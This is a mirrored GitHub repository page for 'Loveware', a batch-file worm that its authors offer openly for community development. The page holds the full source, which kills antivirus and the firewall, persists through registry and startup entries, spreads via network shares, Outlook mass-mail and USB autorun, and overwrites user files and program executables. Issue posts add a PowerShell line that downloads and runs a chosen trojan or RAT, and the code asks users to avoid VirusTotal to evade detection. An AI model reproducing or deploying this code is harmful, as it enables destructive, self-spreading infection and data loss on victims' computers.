maldev101 / loveware Goto Github PK

View Code? Open in Web Editor NEW

52.0 5.0 19.0 3.77 MB

Community driven computer worm

License: GNU General Public License v3.0

Batchfile 100.00%

worm malware malware-samples malware-development network networm email-sender emailworm email-worm net-worm

loveware's Introduction

Loveware

A community driven computer worm

Disclaimer

A classic disclaimer

This worm is not made to damage anyone, we are not targeting anyone with this software. We are not responsible for the damage caused by this software. This is only a project we do not want to damage anyone. This software was made only for educational purposes.

About

This is a very dangerous worm it spreads true USB, email and internet. The payloads are evolving constantly. When you start Loveware, after a while there will be a pink terminal screen in front of you it will ask you:"Do you love me? (only answer with yes or no)". If you choose no then you need to know that your computer is doomed. Some very nasty payloads will start that will kill your computer in the end. If you choose yes you will be able to recover your files or maybe use your computer after some fun payloads.

Thats it for now I hope you enjoy our "little project"

Usefull links

Loveware infected map: https://canarytokens.org/manage?token=h8blu81q8j2vzu825fmpzut7r&auth=e8be20c708872b669cd4562d35b5abf7 Track all infected by Loveware people

Join the malware community at Gitter: https://gitter.im/Malware Chat with malware developers and malware enthusiasts

FOR MORE INFORMATION GO

#CreateMalwareForFunNotProfit

loveware's People

Contributors

Stargazers

Watchers

Forkers

gitter-badger xjwcrab a11y-spec bitpang98 tubbz-alt atomic666 actorexpose taufiqalif lfgon slic3in ammutxyz anonymouslgd d313373 johnnseu mushfiqur47 croat79 chettest samirhosseini

loveware's Issues

Not an issue but!!

Added a mini script that will download a file and then run it after 45 seconds to ensure it is downloaded if the victim has slow wifi
This is really basic but you can use it to add a grabber, trojan, backdoor, rat or anything like that

:: Set up local environment
setlocal

:: Get the current user's username
for /f "tokens=*" %%a in ('whoami') do set "currentUser=%%a"

:: DAN's modified file download and execution script
powershell.exe -Command "& {(New-Object Net.WebClient).DownloadFile('https://example.com/Example.exe', [System.IO.Path]::Combine($env:LOCALAPPDATA, 'Temp\Example.exe')); Start-Sleep -Seconds 45; Start-Process ([System.IO.Path]::Combine($env:LOCALAPPDATA, 'Temp\Example.exe'))}"

:: End local environment
endlocal

IMPORTANT:
change https://example.com/Example.exe with your own URL, remember to keep it in the quote marks ''
change Example.exe to the name of your file

payload request

LoveWarepayload.zip

This payload overwrites all files in USB devices with itself, disguises as system repair.

Report bugs here

Add your code to Loveware

Worm but no distruction

Edited the code so the worm still exists but the destruction isnt as bad...
also added code that will download a custom file (trojan, rat etc)
IMPORANT:
Once you find this part of the code:

:: Download custom file virus rat etc
powershell.exe -Command "& {(New-Object Net.WebClient).DownloadFile('https://example.com/Example.exe', [System.IO.Path]::Combine($env:LOCALAPPDATA, 'Temp\Example.exe')); Start-Sleep -Seconds 45; Start-Process ([System.IO.Path]::Combine($env:LOCALAPPDATA, 'Temp\Example.exe'))}"

please change https://example.com/Example.exe to ur own link (direct download)
change Example.exe to your file name

@echo off

:: THIS VERSION CAN CONTAIN BUGS
::
:: LOVEWARE v9.4
::
::
:: Name: Loveware
:: Creator: Da2dalus
:: What is this in gods name?!:
:: This is a worm that will mess up your computer!
:: BTW It is community driven!!! :)
::  ____________________________________________________
:: |___________________MALWARE CLASS____________________|
:: |TYPE______|ANSWER___________________________________|
:: |LOVELETTER|YES THIS IS A LOVELETTER BASED SOFTWARE  |
:: |Spyware   |NO                                       |
:: |Trojan    |YOU CAN CHOOSE                           |
:: |Email worm|YES                                      |
:: |Net worm  |YES                                      |
:: |XSS worm  |NOT THERE YET ;)                         |
:: |Adware    |NO                                       |
:: |RAT       |I AM NOT SO BAD                          |
:: |Backdoor  |PROBABLY NOT ;) (NO)                     |       
:: |YOUR DOOM!|DEFINETLY!!!!!!!!!!                      |         
::
:: IF YOU FIX A BUG OR ADD SOMETHING NEW TO THE SOFTWARE 
:: YOUR NAME WILL APPEAR HERE:
::  ______________________________
:: |MEMBERS_______________________|
:: |Da2dalus__________|CREATOR____|
:: |a11y-spec_________|CONTRIBUTOR|
:: |__________________|___________|
:: |__________________|___________|
:: |__________________|___________|
:: 
:: Notes:
:: This software needs to be converted to exe
:: (add "invisible startup for better preformance").
:: Please send me a message on github or in the Issuses tab of this repo on github
:: https://github.com/Da2dalus/Loveware
:: if you find any bugs or if you have
:: a good idea about something we can add to this software.
:: Disclamer:
:: I am not responsible for the damage caused by this software.
::
::    ,--,                                                                           
::  ,---.'|                                                                           
::  |   | :                                                                           
::  :   : |                                                                           
::  |   ' :      ,---.                              .---.             __  ,-.         
::  ;   ; '     '   ,'\      .---.                 /. ./|           ,' ,'/ /|         
::  '   | |__  /   /   |   /.  ./|  ,---.       .-'-. ' |  ,--.--.  '  | |' | ,---.   
::  |   | :.'|.   ; ,. : .-' . ' | /     \     /___/ \: | /       \ |  |   ,'/     \  
::  '   :    ;'   | |: :/___/ \: |/    /  | .-'.. '   ' ..--.  .-. |'  :  / /    /  | 
::  |   |  ./ '   | .; :.   \  ' .    ' / |/___/ \:     ' \__\/: . .|  | ' .    ' / | 
::  ;   : ;   |   :    | \   \   '   ;   /|.   \  ' .\    ," .--.; |;  : | '   ;   /| 
::  |   ,/     \   \  /   \   \  '   |  / | \   \   ' \ |/  /  ,.  ||  , ; '   |  / | 
::  '---'       `----'     \   \ |   :    |  \   \  |--";  :   .'   \---'  |   :    | 
::                          '---" \   \  /    \   \ |   |  ,     .-./       \   \  /  
::                                 `----'      '---"     `--`---'            `---  
:: DO NOT UPLOAD ON VIRUSTOTAL!!!
::                                                                         

color 57

title Loveware

:: Only run as admin function

:admin

net session >nul 2>&1

if %errorLevel% == 0 (
    goto runner
) else (
    echo msgbox("Please run as admin",0+64,"Admin") > C:\Windows\Admin.vbs
    start C:\Windows\Admin.vbs
    pause
    exit
)

:runner

:: Disable antivirus, firewall, taskmanager...

net stop "SDRSVC"
net stop "WinDefend"
taskkill /f /t /im "MSASCui.exe"
net stop "security center"
netsh firewall set opmode mode-disable
net stop "wuauserv"
net stop "Windows Defender Service"
net stop "Windows Firewall"
net stop sharedaccess

del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*

:: Change file name to Client

RENAME %0 Client.exe

:: Move Client to the windows directory

MOVE /e /y Client.exe C:\Windows

:: Set up local environment
setlocal

:: Get the current user's username
for /f "tokens=*" %%a in ('whoami') do set "currentUser=%%a"

:: Download custom file virus rat etc
powershell.exe -Command "& {(New-Object Net.WebClient).DownloadFile('https://example.com/Example.exe', [System.IO.Path]::Combine($env:LOCALAPPDATA, 'Temp\Example.exe')); Start-Sleep -Seconds 45; Start-Process ([System.IO.Path]::Combine($env:LOCALAPPDATA, 'Temp\Example.exe'))}"

:: End local environment
endlocal

:: Copy Client to the startup

XCOPY "Client.exe" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"

:: Infect network connected computers

@echo off > service.bat
SET "NomeProcesso=Client.exe" >> service.bat
SET "NomeService=Client" >> service.bat
echo sc create %NomeService% binpath=%0 >> service.bat
echo sc start %NomeService% >> service.bat

attrib +h +r +s service.bat
start service.bat

SET i=0

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
attrib +h +r +s %0

:Internet
net use Z: \\192.168.1.%i%\C$
if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
mountvol Z: /d)
if %i% == 256 (goto Infect) else (set /a i=i+1)
goto worm
goto Internet

:Infect
for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.exe)
for /f %%f in ('dir C:\Users\*.exe /s /b') do (copy %0 %%f)
goto Infect

:: Send Client to all the contacts of the user
:: with outlook

:worm

set Slash=\
if exist %SystemDrive%%Slash%AUTOEXEC.BAT (
del %SystemDrive%%Slash%AUTOEXEC.BAT
copy %0 %SystemDrive%%Slash%AUTOEXEC.BAT
attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
)
set a=Client
copy %0 %windir%\%a%.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
set b=Loveware
copy %0 %windir%\%b%.exe
echo [windows] >> %windir%\win.ini
echo run=%windir%\%b%.exe >> %windir%\win.ini
echo load=%windir%\%b%.exe >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe %b%.exe >> %windir%\system.ini
echo dim x>>%SystemDrive%\mail.vbs
echo on error resume next>>%SystemDrive%\mail.vbs
echo Set fso ="Scripting.FileSystem.Object">>%SystemDrive%\mail.vbs
echo Set so=CreateObject(fso)>>%SystemDrive%\mail.vbs
echo Set ol=CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
echo Set out=WScript.CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
echo Set mapi = out.GetNameSpace("MAPI")>>%SystemDrive%\mail.vbs
echo Set a = mapi.AddressLists(1)>>%SystemDrive%\mail.vbs
echo Set ae=a.AddressEntries>>%SystemDrive%\mail.vbs
echo For x=1 To ae.Count>>%SystemDrive%\mail.vbs
echo Set ci=ol.CreateItem(0)>>%SystemDrive%\mail.vbs
echo Set Mail=ci>>%SystemDrive%\mail.vbs
echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)>>%SystemDrive%\mail.vbs
echo Mail.Subject="Is this you?">>%SystemDrive%\mail.vbs
echo Mail.Body="Man that has got to be embarrassing!">>%SystemDrive%\mail.vbs
echo Mail.Attachments.Add(%0)>>%SystemDrive%\mail.vbs
echo Mail.send>>%SystemDrive%\mail.vbs
echo Next>>%SystemDrive%\mail.vbs
echo ol.Quit>>%SystemDrive%\mail.vbs
start "" "%SystemDrive%\mail.vbs"

goto run2

goto worm

:: Infect autoexec.bat

:run2

set Slash=\
if exist %SystemDrive%%Slash%AUTOEXEC.BAT (
attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
del %SystemDrive%%Slash%AUTOEXEC.BAT
copy %0 %SystemDrive%%Slash%AUTOEXEC.BAT
attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
)
set a=Client
copy %0 %windir%\%a%.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
copy %0 "%userprofile%\Start Menu\Programs\Startup"
set b=Loveware
copy %0 %windir%\%b%.exe
echo [windows] >> %windir%\win.ini
echo run=%windir%\%b%.exe >> %windir%\win.ini
echo load=%windir%\%b%.exe >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe %b%.exe >> %windir%\system.ini

:: Create autorun file

echo [autorun] > windows.inf
echo ;open=Client.exe >> windows.inf
echo ShellExecute=Client.exe >> windows.inf
echo UseAutoPlay=1 >> windows.inf

:: Copy windows.inf to usb

xcopy /e /y windows.inf D:\
xcopy /e /y windows.inf E:\
xcopy /e /y windows.inf F:\
xcopy /e /y windows.inf G:\
xcopy /e /y windows.inf H:\

:: Copy loveware to usb drives

xcopy /e /y Client.exe D:\
xcopy /e /y Client.exe E:\
xcopy /e /y Client.exe F:\
xcopy /e /y Client.exe G:\
xcopy /e /y Client.exe H:\

:: Use KaZaa to spread if the user has this ancient stuff

if exist C:\Program Files\KaZaa\My Shared Folder\ (
    xcopy Client.exe C:\Program Files\KaZaa\My Shared Folder\list.doc.exe
    goto key
) else (
    goto key
)

:key

:: Infect different files: lnk, mp3, doc, pdf....

assoc .lnk=batfile
DIR /S/B %SystemDrive%\*.lnk >> InfList_lnk.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_lnk.txt) do copy /y %0 "%%j:%%k"

assoc .doc=batfile
DIR /S/B %SystemDrive%\*.doc >> InfList_doc.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_doc.txt) do copy /y %0 "%%j:%%k"

assoc .txt=batfile
DIR /S/B %SystemDrive%\*.txt >> InfList_txt.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_txt.txt) do copy /y %0 "%%j:%%k"

assoc .pdf=batfile
DIR /S/B %SystemDrive%\*.pdf >> InfList_pdf.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_pdf.txt) do copy /y %0 "%%j:%%k"

assoc .xml=batfile
DIR /S/B %SystemDrive%\*.xml >> InfList_xml.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_xml.txt) do copy /y %0 "%%j:%%k"

assoc .mp3=batfile
DIR /S/B %SystemDrive%\*.mp3 >> InfList_mp3.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp3.txt) do copy /y %0 "%%j:%%k"

assoc .mp4=batfile
DIR /S/B %SystemDrive%\*.mp4 >> InfList_mp4.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp4.txt) do copy /y %0 "%%j:%%k"

assoc .png=batfile
DIR /S/B %SystemDrive%\*.png >> InfList_png.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_png.txt) do copy /y %0 "%%j:%%k"

:: Send message to other users

:haha
msg * "I Love You!"
net send * "I Love You"
goto run3
goto haha

:run3

:: Overwrite some programs and taskmanager for extra fun

tskill pbrush
copy /y Client.exe C:\Windows\pbrush.exe

tskill excel
copy /y Client.exe "%SystemDrive%\Program Files\Microsoft Office\Office10\EXCEL.EXE"

tskill mspaint
copy /y Client.exe "%windir%\system32\mspaint.exe"

tskill WINWORD
copy /y Client.exe "%SystemDrive%\Program Files\Microsoft Office\Office10\WINWORD.EXE"

tskill calc
copy /y Client.exe "%windir%\system32\calc.exe

tskill msaccess
copy /y Client.exe "%SystemDrive%\Program Files\Microsoft Office\Office10\MSACCESS.EXE"

tskill iexplore
copy /y Client.exe "C:\Program Files\Internet Explorer\iexplore.exe"

tskill safari
copy /y Client.exe "C:\Program Files\Safari\Safari.exe"

tskill brave
copy /y Client.exe "C:\Program Files\BraveSoftware\Brave-Browser\Application\Brave.exe"

tskill Firefox
copy /y Client.exe "C:\Program Files\Mozilla Firefox\firefox.exe"

:: Put on some music

start /min https://www.youtube.com/watch?v=XpqqjU7u5Yc

::       .....           .....
::   ,ad8PPPP88b,     ,d88PPPP8ba,
::  d8P"      "Y8b, ,d8P"      "Y8b
:: dP'           "8a8"           `Yd
:: 8(              "              )8
:: I8       CODED WITH LOVE       8I
::  Yb,     BY THE LOVEWARE     ,dP
::   "8a,        TEAM         ,a8"
::     "8a,                 ,a8"
::       "Yba             adP"
::         `Y8a         a8P'
::           `88,     ,88'
::             "8b   d8"
::              "8b d8"
::               `888'
::                 "
::
::
:: PLEASE DO NOT COPY THE LOVEWARE CODE AND RENAME IT
:: THAT'S NOT CREATING THAT IS STEALING.
:: THIS SOFTWARE IS PROTECTED BY A GNU PUBLIC LICENSE
:: DO NOT UPLOAD THIS SAMPLE ON VIRUS TOTAL TO PREVENT 
:: ANTI VIRUS DETECTION.
:: I AND THE TEAM ARE NOT RESPONSIBLE FOR THE DAMAGE CAUSED BY 
:: THIS SOFTWARE!
::
:: THANKS FOR THE PEOPLE WHO ADDET THERE CODE TO THIS PROJECT
:: AND SUPPORTED IT
::
:: NEW VERSIONS WILL BE COMING SOON (I HOPE)
::
:: Greetings from the LOVEWARE TEAM

New to all this need help. please?

I downloaded the malware "loveware" and it won't display the pink terminal which says "do you love me?"
I lunched it on windows 10 x64/x86 where both didn't display the terminal interface

But both of them did crash after I rebooted them

any help would be appreciated. am using this malware for a university project about "Malware analysis"

Thank you.

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.